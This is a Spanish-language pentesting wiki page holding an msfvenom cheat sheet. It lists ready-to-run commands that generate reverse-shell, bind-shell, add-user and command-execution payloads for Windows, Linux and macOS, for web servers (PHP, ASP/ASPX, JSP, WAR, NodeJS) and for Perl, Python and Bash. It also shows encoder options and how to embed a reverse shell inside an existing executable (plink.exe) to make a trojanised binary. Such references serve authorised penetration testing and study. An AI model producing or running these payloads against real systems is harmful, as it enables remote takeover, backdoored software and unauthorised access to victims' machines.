Inténtalo Más Duro
WEB
Buscar
⌃K
Links

MSFVenom

Estructura General

msfvenom -p $PAYLOAD -e $ENCODER -f $FORMAT -i $ENCODECOUNT LHOST=$LHOST LPORT=$LPORT > $OUTPUT

Listado

msfvenom -l payloads # Payloads
msfvenom -l encoders # Encoders
msfvenom -l formats # Formatos
msfvenom -l archs # Arquitecturas

Parámetros comunes creando una shellcode

-b "\x00\x0a\x0d" # Caracteres a evitar
-f c # Formato
-e x86/shikata_ga_nai -i 5 # Encode e iteraciones del mismo
EXITFUNC=thread # Para windows
PrependSetuid=True # Úsalo cuando la shellcode vaya a ejecutar algo con SUID

Windows Payloads

Reverse Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f exe > reverse.exe

Bind Shell

msfvenom -p windows/meterpreter/bind_tcp RHOST=$RHOST RPORT=$LPORT -f exe > bind.exe

Crear Usuario

msfvenom -p windows/adduser USER=$USERNAME PASS=$PASSWORD -f exe > adduser.exe

CMD Shell

msfvenom -p windows/shell/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f exe > prompt.exe

Ejecutar Comando

msfvenom -a x86 --platform Windows -p windows/exec CMD="$COMMAND" -f exe > pay.exe

Embedido dentro de un ejecutable ya creado

msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe

Linux Payloads

Reverse Shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f elf > reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f elf > shell.elf

Bind Shell

msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=$RHOST LPORT=$LHOST -f elf > bind.elf

OSX Payloads

Reverse Shell:

msfvenom -p osx/x86/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f macho > reverse.macho

Bind Shell

msfvenom -p osx/x86/shell_bind_tcp RHOST=$RHOST LPORT=$LHOST -f macho > bind.macho

Web Based Payloads

PHP

Reverse shell

msfvenom -p php/meterpreter_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f raw > shell.php

ASP/x

Reverse shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f asp > reverse.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f aspx > reverse.aspx

JSP

Reverse shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f raw > reverse.jsp

WAR

Reverse Shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f war > reverse.war

NodeJS

msfvenom -p nodejs/shell_reverse_tcp LHOST=$LHOST LPORT=$LPORT

Payloads para Lenguajes de Script

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=$LHOST LPORT=$LPORT -f raw > reverse.pl

Python

msfvenom -p cmd/unix/reverse_python LHOST=$LHOST LPORT=$LPORT -f raw > reverse.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=$LHOST LPORT=$LPORT -f raw > shell.sh
Shells & Payloads - Anterior
Shells
Próximo - Shells & Payloads
Upgradear a TTY Interactiva
Última actualización 1yr ago